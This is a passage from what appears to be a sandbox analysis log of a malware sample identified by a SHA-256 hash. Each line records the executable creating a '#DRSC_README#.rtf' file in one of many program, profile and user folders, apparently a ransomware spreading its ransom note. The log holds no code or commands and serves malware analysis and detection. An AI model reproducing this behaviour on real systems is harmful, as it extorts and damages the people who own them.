DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\hr-hr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\sv-se\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\themes\dark\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\qml\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\cy\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ko-kr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\fr-ma\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\pa-Arab-PK\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\it-it\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\bn\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\hu-hu\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\fr-fr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sk-sk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\fy\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\hu-hu\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\sv-se\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\pa\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{a11ac4c1-a54a-4c72-80dc-b4f43009ca6d}\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\nl-nl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\themes\dark\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\ProgramData\Microsoft OneDrive\setup\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\lb-LU\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\Pictures\Camera Roll\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.ja_5.5.0.165303\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\uk-ua\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\META-INF\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\pt-br\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\pl-pl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\it-it\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\sv\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\cs-cz\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\en-gb\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\images\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\es\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\fi-fi\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\hr-hr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ca-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\css\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\es-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\pt-br\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\pl-pl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\it-it\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ca-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\pt-br\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\fr-ma\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\eu-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\dropins\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ru-ru\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\zh-cn\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\cs-cz\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\hr-hr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\eu-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\sl-si\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\sk-sk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\hu-hu\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\cs-cz\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\kn\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\bs-Latn-BA\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\Settings\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jre1.8.0_66\lib\ext\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\eu-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\ko-kr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\oc\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\cs-cz\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\sl-si\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\zh-cn\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iq5q997v.default-release\datareporting\archived\2020-07\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\fr-ma\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\nb-no\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\fi-fi\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\fur\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\mn\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\xh-ZA\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Settings\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\he\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ms\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\jre\lib\security\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\da\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\nb\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\iq5q997v.default-release\cache2\entries\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\pt_BR\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\en-il\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files-select\js\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\zh-cn\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\eu\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\TempState\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\dummy\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\jre\lib\images\cursors\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\en-ae\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\themes\dark\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fr-fr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\da-dk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\Settings\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\nl-nl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\ca-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\eu-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\en-gb\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\jre\lib\jfr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\fr-fr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\fr-ma\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\hu-hu\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\it-it\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\Credentials\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\fil-PH\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\jre\bin\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Mozilla Firefox\browser\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\uk-ua\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jre1.8.0_66\bin\server\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\pa\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\nb-no\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\hu-hu\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ja-jp\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\css\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Installer\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\sk-sk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\ro-ro\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\nl-nl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ca-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader 